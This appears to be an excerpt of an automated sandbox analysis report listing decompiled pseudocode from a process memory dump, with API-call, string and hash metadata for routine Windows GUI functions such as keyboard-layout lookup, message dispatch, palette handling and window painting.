C-Code - Quality: 76%

E00454878(intOrPtr __eax, void* __ebx, void* __fp0) { intOrPtr _v8; int _v12; void* _v16; char _v20; void* _v24; struct HKL__* _v280; char _v536; char _v600; char _v604; char _v608; char _v612; void* _t60; intOrPtr _t106; intOrPtr _t111; void* _t117; void* _t118; intOrPtr _t119; void* _t129; _t129 = __fp0; _t117 = _t118; _t119 = _t118 + 0xfffffda0; _v612 = 0; _v8 = __eax; _push(_t117); _push(0x454a23); _push( *[fs:eax]); *[fs:eax] = _t119; if( *((intOrPtr*)(_v8 + 0x34)) != 0) { L11: _pop(_t106); *[fs:eax] = _t106; _push(0x454a2a); return E0040473C( &_v612); } else { *((intOrPtr*)(_v8 + 0x34)) = E004038F8(1); E0040473C(_v8 + 0x38); _t60 = GetKeyboardLayoutList(0x40, &_v280) - 1; if(_t60 < 0) { L10: *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x25)) = 0; E0041C564( *((intOrPtr*)(_v8 + 0x34)), 1); goto L11; } else { _v20 = _t60 + 1; _v24 = &_v280; do { if(E00447838( *_v24) == 0) { goto L9; } else { _v608 = *_v24; _v604 = 0; if(RegOpenKeyExA(0x80000002, E0040968C( &_v600, &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019, &_v16) != 0) { goto L9; } else { _push(_t117); _push(0x4549df); _push( *[fs:eax]); *[fs:eax] = _t119; _v12 = 0x100; if(RegQueryValueExA(_v16, "layout text", 0, 0, &_v536, &_v12) == 0) { E004049AC( &_v612, 0x100, &_v536); *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))(); if( *_v24 == *((intOrPtr*)(_v8 + 0x3c))) { E004049AC(_v8 + 0x38, 0x100, &_v536); } } _pop(_t111); *[fs:eax] = _t111; _push(0x4549e6); return RegCloseKey(_v16); } } goto L12; L9: _v24 = _v24 + 4; _t38 = &_v20; *_t38 = _v20 - 1; } while ( *_t38 != 0); goto L10; } } L12: } 0x00454878 0x00454879 0x0045487b 0x00454884 0x0045488a 0x0045488f 0x00454890 0x00454895 0x00454898 0x004548a2 0x00454a04 0x00454a0c 0x00454a0f 0x00454a12 0x00454a22 0x004548a8 0x004548b7 0x004548c0 0x004548d3 0x004548d6 0x004549f3 0x004549f9 0x004549ff 0x00000000 0x004548dc 0x004548dd 0x004548e6 0x004548e9 0x004548f5 0x00000000 0x004548fb 0x0045490d 0x00454913 0x0045493d 0x00000000 0x00454943 0x00454945 0x00454946 0x0045494b 0x0045494e 0x00454951 0x00454977 0x0045498a 0x004549a2 0x004549b0 0x004549c3 0x004549c3 0x004549b0 0x004549ca 0x004549cd 0x004549d0 0x004549de 0x004549de 0x0045493d 0x00000000 0x004549e6 0x004549e6 0x004549ea 0x004549ea 0x004549ea 0x00000000 0x004548e9 0x004548d6 0x00000000

APIs

GetKeyboardLayoutList.USER32(00000040,?,00000000,00454A23,?,026E66A0,?,00454A85,00000000,?,0043D6E3), ref: 004548CE RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00454936 RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004549DF,?,80000002,00000000), ref: 00454970 RegCloseKey.ADVAPI32(?,004549E6,00000000,?,00000100,00000000,004549DF,?,80000002,00000000), ref: 004549D9

Strings

System\CurrentControlSet\Control\Keyboard Layouts\%.8x , xrefs: 00454920 layout text , xrefs: 00454967

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text API String ID: 1703357764-2652665750 Opcode ID: 6d950a78d596bce349ac28c6b00e7c38b4d53903a2e4a87453a5ac708e1c6b62 Instruction ID: 59853e96f857d77ef27d539afe0c0d9e90707fb92448eacf3fe576158862f236 Opcode Fuzzy Hash: 6d950a78d596bce349ac28c6b00e7c38b4d53903a2e4a87453a5ac708e1c6b62 Instruction Fuzzy Hash: 42418074A002089FDB10DF65C982BDEB7F4EB88304F5140A6E904EB352D738AE44CF69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E00456C8C(void* __eax, char* __ecx, struct tagMSG* __edx) { char _v19; char _t12; int _t13; void* _t14; int _t30; int _t32; MSG* _t42; void* _t43; char* _t45; _t33 = __ecx; _push(__ecx); _t42 = __edx; _t43 = __eax; _t32 = 0; if(PeekMessageA(__edx, 0, 0, 0, 0) != 0) { *_t45 = _t12; if( *_t45 == 0) { _t13 = PeekMessageA(_t42, 0, 0, 0, 1); asm("sbb eax, eax"); _t14 = _t13 + 1; } else { _t30 = PeekMessageW(_t42, 0, 0, 0, 1); asm("sbb eax, eax"); _t14 = _t30 + 1; } if(_t14 != 0) { _t32 = 1; if(_t42->message == 0x12) { *((char*)(_t43 + 0xa4)) = 1; } else { _v19 = 0; if( *((short*)(_t43 + 0x102)) != 0) { _t33 = &_v19; *((intOrPtr*)(_t43 + 0x100))(); } if(E004586B8(_t43, _t33, _t42) == 0 && E00456B50(_t43, _t42) == 0 && _v19 == 0 && E00456A0C(_t43, _t42) == 0 && E00456A5C(_t43, _t42) == 0 && E004569C4(_t43, _t42) == 0) { TranslateMessage(_t42); if( *_t45 == 0) { DispatchMessageA(_t42); } else { DispatchMessageW(_t42); } } } } } return _t32; } 0x00456c8c 0x00456c90 0x00456c91 0x00456c93 0x00456c95 0x00456ca7 0x00456cc3 0x00456cca 0x00456ceb 0x00456cf3 0x00456cf5 0x00456ccc 0x00456cd5 0x00456cdd 0x00456cdf 0x00456cdf 0x00456cf8 0x00456cfe 0x00456d04 0x00456d8f 0x00456d0a 0x00456d0a 0x00456d17 0x00456d19 0x00456d25 0x00456d25 0x00456d36 0x00456d74 0x00456d7d 0x00456d88 0x00456d7f 0x00456d80 0x00456d80 0x00456d7d 0x00456d36 0x00456d04 0x00456cf8 0x00456d9d

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00456CA0 IsWindowUnicode.USER32 ref: 00456CB4 PeekMessageW.USER32 ref: 00456CD5 PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00456CEB TranslateMessage.USER32 ref: 00456D74 DispatchMessageW.USER32 ref: 00456D80 DispatchMessageA.USER32 ref: 00456D88

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow String ID: API String ID: 2190272339-0 Opcode ID: ce108f1353adfe3f0eabd43af3c2355551d53940c5a503e7f97a1d3e0db82999 Instruction ID: 5f7cc9d7226b631bc1ffbd552804f8e8163c3220582b39396143643a60f640cf Opcode Fuzzy Hash: ce108f1353adfe3f0eabd43af3c2355551d53940c5a503e7f97a1d3e0db82999 Instruction Fuzzy Hash: 1321D92070438026F6316A254E41B7B97A54F9374AF56481FFD85A73C3DAAEBC8E421E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 55%

E004334BC(void* __ebx, void* __esi, void* __eflags) { char _v8; struct HINSTANCE__* _v12; intOrPtr _v16; char _v26; char _v32; char _v36; intOrPtr _t63; void* _t66; void* _t67; intOrPtr _t68; void* _t69; _t69 = __eflags; _t47 = __ebx; _t66 = _t67; _t68 = _t67 + 0xffffffe0; _push(__ebx); _v32 = 0; _v36 = 0; _v8 = 0; _push(_t66); _push(0x4335ef); _push( *[fs:eax]); *[fs:eax] = _t68; _v26 = 0; GetKeyboardLayoutNameA( &_v26); _v16 = E00423918(1); _push(_t66); _push(0x4335c5); _push( *[fs:edx]); *[fs:edx] = _t68; E004239B8(_v16, 0x80000002); E004049AC( &_v36, 0xa, &_v26); E00404A4C( &_v32, _v36, "\\SYSTEM\\CurrentControlSet\\Control\\Keyboard Layouts\\"); E00423A1C(_v16, __ebx, _v32, __esi); E00423C4C(_v16, &_v8, "Layout File", _t69); _v12 = E0040DDC0(_v8, _t47, 0x8000); _push(_t66); _push(0x4335a8); _push( *[fs:edx]); *[fs:edx] = _t68; *0x462548 = ( *( *(GetProcAddress(_v12, "KbdLayerDescriptor"))() + 0x28) & 1) == 1; _pop(_t63); *[fs:eax] = _t63; _push(0x4335af); return FreeLibrary(_v12); } 0x004334bc 0x004334bc 0x004334bd 0x004334bf 0x004334c2 0x004334c5 0x004334c8 0x004334cb 0x004334d0 0x004334d1 0x004334d6 0x004334d9 0x004334dc 0x004334e4 0x004334f5 0x004334fa 0x004334fb 0x00433500 0x00433503 0x0043350e 0x0043351e 0x0043352e 0x00433539 0x00433549 0x0043355b 0x00433560 0x00433561 0x00433566 0x00433569 0x0043358a 0x00433593 0x00433596 0x00433599 0x004335a7

APIs

GetKeyboardLayoutNameA.USER32 ref: 004334E4 Part of subcall function 004239B8: RegCloseKey.ADVAPI32(10CC0000,00423894,00000001,00423936,?,?,0042AD66,00000008,00000060,00000048,00000000,0042AE0B), ref: 004239CC Part of subcall function 00423A1C: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88 Part of subcall function 0040DDC0: SetErrorMode.KERNEL32 ref: 0040DDCA Part of subcall function 0040DDC0: LoadLibraryA.KERNEL32(00000000,00000000,0040DE14,?,00000000,0040DE32), ref: 0040DDF9 GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 00433575 FreeLibrary.KERNEL32(?,004335AF,?,00000000,00000000,004335EF), ref: 004335A2

Strings

Layout File , xrefs: 00433541 \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\ , xrefs: 00433529 KbdLayerDescriptor , xrefs: 0043356C

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\ API String ID: 3365787578-2194312379 Opcode ID: 30fe6d65afb9ff2c8a4add937bd16555c20e8b1eadddcbf00d4f0d828bd5cc06 Instruction ID: b7f935374733f2b043a6a9212af3645c2f8cc5f46ad59cc71e04b143bdb154a3 Opcode Fuzzy Hash: 30fe6d65afb9ff2c8a4add937bd16555c20e8b1eadddcbf00d4f0d828bd5cc06 Instruction Fuzzy Hash: 9221B2B0E00209BFCB01EFA5C85299EBBB6EB8D704F518476F400A7750D77DAA41CB58

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 56%

E004231B8(intOrPtr _a4, intOrPtr* _a8) { void _v20; void* __ebx; void* __edi; void* __esi; void* __ebp; void* _t24; int _t25; intOrPtr _t27; intOrPtr _t28; intOrPtr* _t30; intOrPtr* _t32; _t30 = _a8; _t28 = _a4; if( *0x46633e != 0) { _t25 = 0; if(_t28 == 0x12340042 && _t30 != 0 && *_t30 >= 0x28 && SystemParametersInfoA(0x30, 0, &_v20, 0) != 0) { *((intOrPtr*)(_t30 + 4)) = 0; *((intOrPtr*)(_t30 + 8)) = 0; *((intOrPtr*)(_t30 + 0xc)) = GetSystemMetrics(0); *((intOrPtr*)(_t30 + 0x10)) = GetSystemMetrics(1); asm("movsd"); asm("movsd"); asm("movsd"); asm("movsd"); _t32 = _t30; *(_t32 + 0x24) = 1; if( *_t32 >= 0x48) { lstrcpyA(_t32 + 0x28, "DISPLAY"); } _t25 = 1; } } else { _t27 = *0x466328; // 0x4231b8 *0x466328 = E00422CE4(6, _t24, _t27, _t28, _t30); _t25 = *0x466328(_t28, _t30); } return _t25; } 0x004231c1 0x004231c4 0x004231ce 0x004231f3 0x004231fb 0x0042321b 0x00423220 0x0042322b 0x00423236 0x00423240 0x00423241 0x00423242 0x00423243 0x00423244 0x00423245 0x0042324f 0x0042325a 0x0042325a 0x0042325f 0x0042325f 0x004231d0 0x004231d5 0x004231e2 0x004231ef 0x004231ef 0x00423269

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00423210 GetSystemMetrics.USER32 ref: 00423225 GetSystemMetrics.USER32 ref: 00423230 lstrcpyA.KERNEL32(?,DISPLAY), ref: 0042325A Part of subcall function 00422CE4: GetProcAddress.KERNEL32(768F0000,00000000), ref: 00422D63

Strings

GetMonitorInfoW , xrefs: 004231D0 DISPLAY , xrefs: 00423251

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy String ID: DISPLAY$GetMonitorInfoW API String ID: 2545840971-2774842281 Opcode ID: ef46426c222f0a8c5ab6ef8e0efa3e8c781f7b32c898a96ae6b7654e867d441d Instruction ID: 96bab24b47e879cbfe0bd9bf5b7a96c5a668f0bc15fc1324eeb591fd9e87288a Opcode Fuzzy Hash: ef46426c222f0a8c5ab6ef8e0efa3e8c781f7b32c898a96ae6b7654e867d441d Instruction Fuzzy Hash: 5B119071B00320AED720CF65AC447A7B7A8EB05721F40456AED4597350D6B8BA44CBA9

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%

E00428588(int __eax, void* __ecx, intOrPtr __edx) { intOrPtr _v8; struct HDC__* _v12; struct HDC__* _v16; void* _v20; struct tagRGBQUAD _v1044; int _t16; int _t37; intOrPtr _t44; void* _t46; void* _t49; void* _t51; intOrPtr _t52; _t16 = __eax; _t49 = _t51; _t52 = _t51 + 0xfffffbf0; _v8 = __edx; _t46 = __eax; if(__eax == 0 || *((short*)(__ecx + 0x26)) > 8) { L4: return _t16; } else { _t16 = E004273B0(_v8, 0xff, &_v1044); _t37 = _t16; if(_t37 == 0) { goto L4; } else { _v12 = GetDC(0); _v16 = CreateCompatibleDC(_v12); _v20 = SelectObject(_v16, _t46); _push(_t49); _push(0x428637); _push( *[fs:eax]); *[fs:eax] = _t52; SetDIBColorTable(_v16, 0, _t37, &_v1044); _pop(_t44); *[fs:eax] = _t44; _push(0x42863e); SelectObject(_v16, _v20); DeleteDC(_v16); return ReleaseDC(0, _v12); } } } 0x00428588 0x00428589 0x0042858b 0x00428593 0x00428596 0x0042859a 0x0042863e 0x00428643 0x004285ab 0x004285b9 0x004285be 0x004285c2 0x00000000 0x004285c4 0x004285cb 0x004285d7 0x004285e4 0x004285e9 0x004285ea 0x004285ef 0x004285f2 0x00428603 0x0042860a 0x0042860d 0x00428610 0x0042861d 0x00428626 0x00428636 0x00428636 0x004285c2

APIs

Part of subcall function 004273B0: GetObjectA.GDI32(?,00000004), ref: 004273C7 Part of subcall function 004273B0: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 004273EA GetDC.USER32(00000000), ref: 004285C6 CreateCompatibleDC.GDI32(?), ref: 004285D2 SelectObject.GDI32(?), ref: 004285DF SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00428637,?,?,?,?,00000000), ref: 00428603 SelectObject.GDI32(?,?), ref: 0042861D DeleteDC.GDI32(?), ref: 00428626 ReleaseDC.USER32 ref: 00428631

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable String ID: API String ID: 4046155103-0 Opcode ID: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c Instruction ID: fc760d696f5b6bfeae7a67bf9a168a54974abfe34dfe22b54ea61c4cebc6b826 Opcode Fuzzy Hash: 0ef47c05c1142c1c4212e51049af1cabbe0614bb78c017c0a708da15428bdc0c Instruction Fuzzy Hash: 72119371E052186BDB10EBE9DC51EAEB3FCEF08704F4144BAB614E7680DA799D508B68

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%

E00454B28(struct HICON__* __eax, short __edx) { short _v18; long _v20; struct tagPOINT _v28; struct HICON__* _t11; long _t16; struct HICON__* _t25; struct HWND__* _t28; short _t29; struct tagPOINT* _t31; _t11 = __eax; _t29 = __edx; _t25 = __eax; if(__edx == *((intOrPtr*)(__eax + 0x44))) { L6: *((intOrPtr*)(_t25 + 0x48)) = *((intOrPtr*)(_t25 + 0x48)) + 1; return _t11; } *((short*)(__eax + 0x44)) = __edx; if(__edx != 0) { L5: _t11 = SetCursor(E00454B00(_t25, _t29)); goto L6; } GetCursorPos(_t31); _push(_v28.y); _t28 = WindowFromPoint(_v28.x); if(_t28 == 0) { goto L5; } _t16 = GetWindowThreadProcessId(_t28, 0); if(_t16 != GetCurrentThreadId()) { goto L5; } _v20 = _v28 & 0x0000ffff; _v18 = _v28.y & 0x0000ffff; return SendMessageA(_t28, 0x20, _t28, SendMessageA(_t28, 0x84, 0, _v20) & 0x0000ffff | 0x02000000); } 0x00454b28 0x00454b2f 0x00454b31 0x00454b37 0x00454bb7 0x00454bb7 0x00000000 0x00454bb7 0x00454b39 0x00454b40 0x00454ba7 0x00454bb2 0x00000000 0x00454bb2 0x00454b43 0x00454b48 0x00454b55 0x00454b59 0x00000000 0x00000000 0x00454b5e 0x00454b6c 0x00000000 0x00000000 0x00454b72 0x00454b7c 0x00000000

APIs

GetCursorPos.USER32 ref: 00454B43 WindowFromPoint.USER32(?,?), ref: 00454B50 GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00454B5E GetCurrentThreadId.KERNEL32 ref: 00454B65 SendMessageA.USER32(00000000,00000084,00000000,?), ref: 00454B8E SendMessageA.USER32(00000000,00000020,00000000,?), ref: 00454BA0 SetCursor.USER32(00000000), ref: 00454BB2

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess String ID: API String ID: 1770779139-0 Opcode ID: 9f5a7c3084286db833192a4aa11ff27d7912034fd2b50688e769e3f1ee89cca9 Instruction ID: 855e5610ba6024dcea5ecb996c65caa1e9501b556084f3035492505de70d9607 Opcode Fuzzy Hash: 9f5a7c3084286db833192a4aa11ff27d7912034fd2b50688e769e3f1ee89cca9 Instruction Fuzzy Hash: 9E01D63150824066C6207B668C81F3B36A4DFC4B59F10446FBE88AA2D2E63DEC44936E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 89%

E0044F90C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) { intOrPtr* _v8; intOrPtr* _v12; struct HDC__* _v16; struct tagPAINTSTRUCT _v80; struct tagRECT _v96; struct tagRECT _v112; signed int _v116; long _v120; void* __ebp; void* _t68; void* _t94; struct HBRUSH__* _t97; intOrPtr _t105; void* _t118; void* _t127; intOrPtr _t140; intOrPtr _t146; void* _t147; void* _t148; void* _t150; void* _t152; intOrPtr _t153; _t148 = __esi; _t147 = __edi; _t138 = __edx; _t127 = __ebx; _t150 = _t152; _t153 = _t152 + 0xffffff8c; _v12 = __edx; _v8 = __eax; _t68 = *_v12 - 0xf; if(_t68 == 0) { _v16 = *(_v12 + 4); if(_v16 == 0) { *(_v12 + 4) = BeginPaint( *(_v8 + 0x29c), &_v80); } _push(_t150); _push(0x44fada); _push( *[fs:eax]); *[fs:eax] = _t153; if(_v16 == 0) { GetWindowRect( *(_v8 + 0x29c), &_v96); E0043A55C(_v8, &_v120, &_v96); _v96.left = _v120; _v96.top = _v116; E00439028( *(_v12 + 4), ~(_v96.top), ~(_v96.left)); } L0043FDA8(_v8, _t127, _v12, _t147, _t148); _pop(_t140); *[fs:eax] = _t140; _push(0x44fae8); if(_v16 == 0) { return EndPaint( *(_v8 + 0x29c), &_v80); } return 0; } else { _t94 = _t68 - 5; if(_t94 == 0) { _t97 = E004261BC( *((intOrPtr*)(_v8 + 0x1a4))); *((intOrPtr*)( *_v8 + 0x44))(); FillRect( *(_v12 + 4), &_v112, _t97); if( *((char*)(_v8 + 0x277)) == 2 && *(_v8 + 0x29c) != 0) { GetClientRect( *(_v8 + 0x29c), &_v96); FillRect( *(_v12 + 4), &_v96, E004261BC( *((intOrPtr*)(_v8 + 0x1a4)))); } _t105 = _v12; *((intOrPtr*)(_t105 + 0xc)) = 1; } else { _t118 = _t94 - 0x2b; if(_t118 == 0) { E0044F880(_t150); _t105 = _v8; if( *((char*)(_t105 + 0x277)) == 2) { if(E00450190(_v8) == 0 || E0044F8CC(_t138, _t150) == 0) { _t146 = 1; } else { _t146 = 0; } _t105 = E0044C934( *(_v8 + 0x29c), _t146); } } else { if(_t118 != 0x45) { _t105 = E0044F880(_t150); } else { E0044F880(_t150); _t105 = _v12; if( *((intOrPtr*)(_t105 + 0xc)) == 1) { _t105 = _v12; *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff; } } } } return _t105; } } 0x0044f90c 0x0044f90c 0x0044f90c 0x0044f90c 0x0044f90d 0x0044f90f 0x0044f912 0x0044f915 0x0044f91d 0x0044f920 0x0044fa30 0x0044fa37 0x0044fa4f 0x0044fa4f 0x0044fa54 0x0044fa55 0x0044fa5a 0x0044fa5d 0x0044fa64 0x0044fa74 0x0044fa82 0x0044fa8a 0x0044fa90 0x0044faa3 0x0044faa3 0x0044faae 0x0044fab5 0x0044fab8 0x0044fabb 0x0044fac4 0x00000000 0x0044fad4 0x0044fad9 0x0044f926 0x0044f926 0x0044f929 0x0044f969 0x0044f977 0x0044f985 0x0044f994 0x0044f9b0 0x0044f9cf 0x0044f9cf 0x0044f9d4 0x0044f9d7 0x0044f92b 0x0044f92b 0x0044f92e 0x0044f9e4 0x0044f9ea 0x0044f9f4 0x0044fa04 0x0044fa15 0x0044fa11 0x0044fa11 0x0044fa11 0x0044fa20 0x0044fa20 0x0044f934 0x0044f937 0x0044fae2 0x0044f93d 0x0044f93e 0x0044f944 0x0044f94b 0x0044f951 0x0044f954 0x0044f954 0x0044f94b 0x0044f937 0x0044f92e 0x0044faeb 0x0044faeb

APIs

FillRect.USER32 ref: 0044F985 GetClientRect.USER32 ref: 0044F9B0 FillRect.USER32 ref: 0044F9CF Part of subcall function 0044F880: CallWindowProcA.USER32 ref: 0044F8BA BeginPaint.USER32(?,?), ref: 0044FA47 GetWindowRect.USER32 ref: 0044FA74 EndPaint.USER32(?,?,0044FAE8), ref: 0044FAD4

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$FillPaintWindow$BeginCallClientProc String ID: API String ID: 901200654-0 Opcode ID: d94346d578d3ee0884cb281a283a1a4aa21f630484195cd9280e2cea34370f60 Instruction ID: 44bf8864a589ba947b4fad5018ef312e79812de65eda3363066782ea35254d35 Opcode Fuzzy Hash: d94346d578d3ee0884cb281a283a1a4aa21f630484195cd9280e2cea34370f60 Instruction Fuzzy Hash: A851EB74A00108EFDB00DBA9D589E9EB7F8AF09314F6581B6E409AB352D738AE45CB15

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 81%

E00427660(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, signed int* _a4, signed int* _a8) { intOrPtr* _v8; intOrPtr _v12; signed int _v16; intOrPtr _v20; signed int _v24; signed int _v32; struct HDC__* _v44; signed int* _t36; signed int _t39; signed int _t42; signed int* _t52; signed int _t56; intOrPtr _t66; void* _t72; void* _t73; void* _t74; intOrPtr _t75; _t73 = _t74; _t75 = _t74 + 0xffffff90; _v16 = __ecx; _v12 = __edx; _v8 = __eax; _t52 = _a8; _v24 = _v16 << 4; _v20 = E00402CF4(_v24); *[fs:edx] = _t75; _t56 = _v24; *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x427959, _t73, __edi, __esi, __ebx, _t72); if(( *_t52 | _t52[1]) != 0) { _t36 = _a4; *_t36 = *_t52; _t36[1] = _t52[1]; } else { *_a4 = GetSystemMetrics(0xb); _a4[1] = GetSystemMetrics(0xc); } _v44 = GetDC(0); if(_v44 == 0) { E00426B18(_t56); } _push(_t73); _push(0x427749); _push( *[fs:edx]); *[fs:edx] = _t75; _t39 = GetDeviceCaps(_v44, 0xe); _t42 = _t39 * GetDeviceCaps(_v44, 0xc); if(_t42 <= 8) { _v32 = 1 << _t42; } else { _v32 = 0x7fffffff; } _pop(_t66); *[fs:eax] = _t66; _push(0x427750); return ReleaseDC(0, _v44); } 0x00427661 0x00427663 0x00427669 0x0042766c 0x0042766f 0x00427672 0x0042767b 0x00427686 0x00427694 0x0042769a 0x004276a2 0x004276aa 0x004276c7 0x004276cc 0x004276d1 0x004276ac 0x004276b6 0x004276c2 0x004276c2 0x004276db 0x004276e2 0x004276e4 0x004276e4 0x004276eb 0x004276ec 0x004276f1 0x004276f4 0x004276fd 0x00427713 0x00427719 0x0042772d 0x0042771b 0x0042771b 0x0042771b 0x00427732 0x00427735 0x00427738 0x00427748

APIs

GetSystemMetrics.USER32 ref: 004276AE GetSystemMetrics.USER32 ref: 004276BA GetDC.USER32(00000000), ref: 004276D6 GetDeviceCaps.GDI32(00000000,0000000E), ref: 004276FD GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042770A ReleaseDC.USER32 ref: 00427743

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceMetricsSystem$Release String ID: API String ID: 447804332-0 Opcode ID: 6db74f019e932430a5205a3f000c479cbdd6ede7329f90984af2c91e504fd773 Instruction ID: 73986ba3f22e50cd3a10517d1b4e47993adae367a89b78d8e0850655de09d4be Opcode Fuzzy Hash: 6db74f019e932430a5205a3f000c479cbdd6ede7329f90984af2c91e504fd773 Instruction Fuzzy Hash: 72314374E04255DFEB00DF65C881AAEBBF5FB49310F50816AF914AB381C678AD41CB69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%

E00427AC0(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) { char _v5; struct HPALETTE__* _v12; struct HDC__* _v16; struct tagBITMAPINFO* _t36; intOrPtr _t43; struct HBITMAP__* _t47; void* _t50; void* _t56; _t36 = __ecx; _t47 = __eax; E0042796C(__eax, _a4, __ecx, _t56); _v12 = 0; _v16 = CreateCompatibleDC(0); _push(_t50); _push(0x427b5d); _push( *[fs:eax]); *[fs:eax] = _t50 + 0xfffffff4; if(__edx != 0) { _v12 = SelectPalette(_v16, __edx, 0); RealizePalette(_v16); } _v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0; _pop(_t43); *[fs:eax] = _t43; _push(E00427B64); if(_v12 != 0) { SelectPalette(_v16, _v12, 0); } return DeleteDC(_v16); } 0x00427ac9 0x00427acd 0x00427ad6 0x00427add 0x00427ae7 0x00427aec 0x00427aed 0x00427af2 0x00427af5 0x00427afa 0x00427b08 0x00427b0f 0x00427b0f 0x00427b2d 0x00427b33 0x00427b36 0x00427b39 0x00427b42 0x00427b4e 0x00427b4e 0x00427b5c

APIs

